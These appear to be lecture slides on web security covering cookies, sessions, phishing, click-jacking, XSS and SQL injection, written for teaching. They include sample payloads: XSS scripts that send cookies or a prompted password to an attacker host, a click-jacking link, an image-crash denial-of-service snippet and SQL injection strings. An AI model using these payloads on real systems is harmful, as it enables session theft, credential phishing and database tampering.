Web Security 08/30/2021

WEB SECURITY
Web Security 08/30/2021

7.1 THE WORLD WIDE WEB

• WWW is used for banking, shopping, communication, collaborating, and social

networking.
• Entire new classes of security and privacy concerns has emerged as web security.
 Web Security 08/30/2021

7.1.1 HTTP HTML

• A web site contains pages of text and images interpreted by a web browser
• A web browser identifies a web site with a uniform resource locator (URL)
• The web browser uses Domain Name System (DNS) to determine the IP address of the web server.
• The hypertext transfer protocol (HTTP) is used to retrieve the requested web page
• The client/web browser makes a TCP connection to a specified port on the web server, by default 80 for
HTTP.
 Web Security 08/30/2021

7.1.1 HTTP HTML

• HTTP requests typically begin with a request line, usually consisting of a command such as GET or
POST.
• HTTP responses deliver the content to the browser along with a response header.
• The response header includes info about the server such as the type and version number.
• Good security practices alter the default server response to not include this info.
• Hypertext markup language (HTML) provides a structural description of a document, rendered by
web browser
 Web Security 08/30/2021

7.1.1 HTTP HTML

• HTML features
• Static document description language
• Supports linking to other pages and embedding images by reference
• User input sent to server via forms
• No encryption provided

• HTML extensions
• Additional media content (e.g., PDF, video) supported through plugins
• Embedding programs in supported languages (e.g., JavaScript, Java) provides dynamic content
that interacts with the user, modifies the browser user interface, and can access the client
computer environment
Web Security 08/30/2021

HTML FORMS

• POST variables are included in the HTTP request’s body.

• It has side effects such as inserting a record in a DB or sending an email.
• Need prompt the user to ensure the user wishes to submit the information again.
Web Security 08/30/2021

• HTTPS is identical to HTTP but incorporates an additional layer of

security known as SSL.
Web Security 08/30/2021

7.1.3 DYNAMIC CONTENT

• Dynamic content in a web page can change in response to user interaction or other
conditions such as passage of time.
• A scripting language is a programming language that provides instructions to be executed
inside an application.
• Client-side scripting language is delivered to the browser and executed by the browser.
• Server-side scripting language is executed on the server, hiding the code from the user
and presenting only the output of the code.
Web Security 08/30/2021

JAVASCRIPT

• Supported by every major browser

• It allows declaration of functions
• It allows reuse of functions
• It handles events such as clicking a link or hovering the mouse pointer over a portion
of a web page.
 Web Security 08/30/2021

7.1.4 SESSIONS AND COOKIES

• HTTP protocol is stateless

• Cookies are a small bit of information stored on a computer associated with a specific server
• When you access a specific website, it might store information as a cookie
• Every time you revisit that server, the cookie is re-sent to the server
• Effectively used to hold state information over sessions
• Cookies can hold any type of information
• Can also hold sensitive information
• This includes passwords, credit card information, social security number, etc.
• Session cookies, non-persistent cookies, persistent cookies
• Almost every large website uses cookies
 Web Security 08/30/2021

MORE ON COOKIES

• Cookies are stored on your computer and can be controlled

• However, many sites require that you enable cookies in order to use the site
• Their storage on your computer naturally lends itself to exploits (Think about how ActiveX could
exploit cookies...)
• You can (and probably should) clear your cookies on a regular basis
• Most browsers will also have ways to turn off cookies, exclude certain sites from adding cookies,
and accept only certain sites' cookies
• Cookies expire
• The expiration is set by the sites' session by default, which is chosen by the server
• This means that cookies will probably stick around for a while
 Web Security 08/30/2021

TAKING CARE OF YOUR COOKIES

• Managing your cookies in Firefox:

• Remove Cookie
• Remove All Cookies
• Displays information of individual cookies
• Also tells names of cookies, which probably gives a good idea of what the cookie stores
• i.e. amazon.com: session-id
 Web Security 08/30/2021

SERVER-SIDE SESSIONS

• A final method of maintaining session information is to devote space on the web server for keeping user
information.
• Servers use a session ID, a unique identifier that corresponds to a user’s session.
• The space and processing required of the server to keep track all of its users’ sessions.
• Used in shopping cart.
Web Security 08/30/2021

7.4 ATTACKS ON CLIENTS

• Session Hijacking
• Intercept communication
between client and server
• Impersonate whatever measures
are being used to maintain HTTP
session
Web Security 08/30/2021

7.2.1 SESSION HIJACKING

• Defense against session hijacking

• Protect against packet sniffers
• Encrypt session tokens by servers.
• Make the session IDs difficulty to predict

• Replay attacks
• Incorporate random numbers
• Change session tokens frequently
• Associate a session token with the IP address of the client
 Web Security 08/30/2021

7.2.2 PHISHING

• Forged web pages created to fraudulently acquire sensitive information

• User typically solicited to access phished page from spam email
• Most targeted sites
• Financial services (e.g., Citibank)
• Payment services (e.g., PayPal)
• Auctions (e..g, eBay)

• ~650K unique phishing sites detected monthly in 2020

Methods to avoid detection
• Misspelled URL
• URL obfuscation
• Removed or forged address bar
Web Security 08/30/2021

PHISHING EXAMPLE

http://www.anti-phishing.com
 Web Security

URL OBFUSCATION

• Properties of page in previous slide

• Actual URL different from spoofed URL displayed in address bar
• URL escape character attack
• Old versions of Internet Explorer did not display anything past the Esc or null character
• Displayed vs. actual site
http://trusted.com%01%[email protected]
• Unicode attack
• Domains names with Unicode characters (not asccii) can be registered
• Identical, or very similar, graphic rendering for some characters
• E.g., Cyrillic and Latin “a”
• Phishing attack on paypal.com
• Current version of browsers display Punycode, an ASCII-encoded version of
Unicode: www.xn--pypal-4ve.com
http://www.anti-phishing.com
08/30/2021
Web Security 08/30/2021

7.2.3 CLICK-JACKING

• A user’s mouse click on a page is used in a way that was not intended by the user.
• Click-jacking attack
<a onMouseUp="window.open(′http://www.evilsite.com′)"
href="http://www.trustedsite.com/">Trust me!</a>

• Creates a link which appears to be point to www.trusted site.com.

• But the code actually uses the javascript function window.open that directs the user to
the alternate site www.evilsite.com after releasing the mouse click.
Web Security 08/30/2021

7.2.3 CLICK-JACKING

• Other Javascript event handlers such as onMounseOver can trigger an action whenever
a user simply moves their mouse over that element.
• Most online advertisers pay the sites that host their advertisements based on the number
of click-throughs.
• Forcing users to unwillingly click on advertisements raises the fraudulent site’s revenue.
Which is known as click fraud.
Web Security 08/30/2021

7.2.4 IE IMAGE CRASH

• Browser implementation bugs can lead to denial of service attacks

• The classic image crash in Internet Explorer is a perfect example
• By creating a simple image of extremely large proportions, one can crash Internet
Explorer and sometimes freeze a Windows machine
<HTML>
<BODY>
<IMG SRC="./imagecrash.jpg" width="9999999" height="9999999"> </BODY>
</HTML>
• Variations of the image crash attack still possible on the latest IE version
Web Security 08/30/2021

MOBILE CODE

• What is mobile code?

• Executable program
• Sent via a computer network
• Executed at the destination

• Examples
• JavaScript
• ActiveX
• Java Plugins
• Integrated Java Virtual Machines
Web Security 08/30/2021

JAVASCRIPT

• Scripting language interpreted by the browser

• Code enclosed within <script> … </script> tags
• Defining functions:
<script type="text/javascript">
function hello() { alert("Hello world!"); }
</script>
• Event handlers embedded in HTML
<img src="picture.gif" onMouseOver="javascript:hello()">
• Built-in functions can change content of window

window.open("http://brown.edu")
 Web Security 08/30/2021

ACTIVEX VS. JAVA

ACTIVEX CONTROL JAVA APPLET

• Windows-only technology runs in Internet Explorer • Platform-independent via browser plugin
• Binary code executed on behalf of browser • Java code running within browser
• Can access user files
• Sandboxed execution
• Support for signed code
• Support for signed code
• An installed control can be run by any site (up to IE7)
• Applet runs only on site where it is
• IE configuration options
• Allow, deny, prompt
embedded
• Administrator approval • Applets deemed trusted by user can escape
sandbox
 Web Security 08/30/2021

AUTHENTICODE IN ACTIVEX

• This signed ActiveX control ask the user

for permission to run
• If approved, the control will run with the
same privileges as the user

• The “Always trust content from …”

checkbox automatically accepts controls by
the same publisher
• Probably a bad idea

Malicious Mobile Code, by R. Grimes, O’Reilly

Books
Web Security 08/30/2021

TRUSTED/UNTRUSTED ACTIVEX
CONTROLS
• Trusted publishers
• List stored in the Windows registry
• Malicious ActiveX controls can modify the registry table to make their publisher trusted
• All future controls by that publisher run without prompting user

• Unsigned controls
• The prompt states that the control is unsigned and gives an accept/reject option
• Even if you reject the control, it has already been downloaded to a temporary folder where it
remains
• It is not executed if rejected, but not removed either
Web Security 08/30/2021

7.2.6 SITE SCRIPTING (XSS)

• Attacker injects scripting code into pages generated by a web application

• Script could be malicious code
• JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash

• Threats:
• Phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising ,
execution of code on the client, ...
 Web Security 08/30/2021

XSS (CROSS SITE SCRIPTING) AN EXAMPLE

Common type of XSS: injecting malicious code

• www.victim.com runs a guestbook application that takes comments

from visitors and displays them
• Input is not sanitized
• An attacker injects script that will be executed by subsequent visitors
• E.g., instead of entering name, attacker enters

<script language=“Javascript">var password=prompt

(‘Your session has expired. Please enter your password to continue.`,``);
Location.href=“https://10.1.1.1/pass.cgi?passwd=“+password;</script>
 Web Security 08/30/2021

COOKIE STEALING XSS ATTACKS

• Attack 1
<script>
document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie;
</script>
Redirect visitor to the attacker’s site and
concatenate the user’s cookies to the URL as a
• Attack 2 GET parameter for the steal.php page.
<script>
img = new Image();
img.src = "http://www.evilsite.com/steal.php?cookie=" + document.cookie;
</script>

The victim’s browser makes a request to this URL for the image, passing the cookie to
the user without displaying any results.
Web Security 08/30/2021

XSS PREVENTIONS

• Sanitize inputs to not allow scripts – important

• HTTP only cookies
• Cookies that can only be used in HTTP requests
• Not accessible by JavaScript via document.cookie

From wikipedia
Web Security 08/30/2021

CLIENT-SIDE XSS DEFENSES

• Proxy-based:
• Analyze HTTP traffic between browser and web server
• Look for special HTML characters
• Encode them before executing the page on the user’s web browser (i.e. NoScript - Firefox plugin)
• Application-level firewall:
• Analyze HTML pages for hyperlinks that might lead to leakage of sensitive information
• Stop bad requests using a set of connection rules
• Auditing system:
• Monitor execution of JavaScript code and compare the operations against high-level policies to detect
malicious behavior
 Web Security 08/30/2021

7.3.2 SERVER-SIDE SCRIPT INCLUSION

VULNERABILITIES
• Read about server – side script inclusion vulnerabilities
Web Security 08/30/2021

SQL INJECTION

• Allows a attacker to access or even modify arbitrary information from a database by

inserting his own SQL commands.
• It is passed to database by a web server.
• The root cause is a lack of input validation on the server’s part.
 Web Security 08/30/2021

LOGIN AUTHENTICATION QUERY

• Standard query to authenticate users:
select * from users where user='$usern' AND pwd='$password'

• Classic SQL injection attacks

• Server side code sets variables $username and $passwd from user input to web form
• Variables passed to SQL query
select * from users where user='$username' AND pwd='$passwd'

• Special strings can be entered by attacker

select * from users where user='M' OR '1=1' AND pwd='M' OR '1=1’ – Why?

• Result: access obtained without password

Web Security 08/30/2021

PREVENTING SQL INJECTION

• Most languages have built-in functions that strip input of dangerous characters.
• PHP provides function mysql_real_escape_string to escape special character (including single and double quotes) so
that the resulting string is safe.
• For example, all “malicious” characters will be changed in the escape method:
• Escape(“t ' c”) gives as a result “t \' c”

select user,pwd from users where user='$usern'

$usern=escape(“M' ;drop table user;”)
• The result is the safe query:
select user,pwd from users
where user='M\' drop table user;\''
Web Security 08/30/2021

•?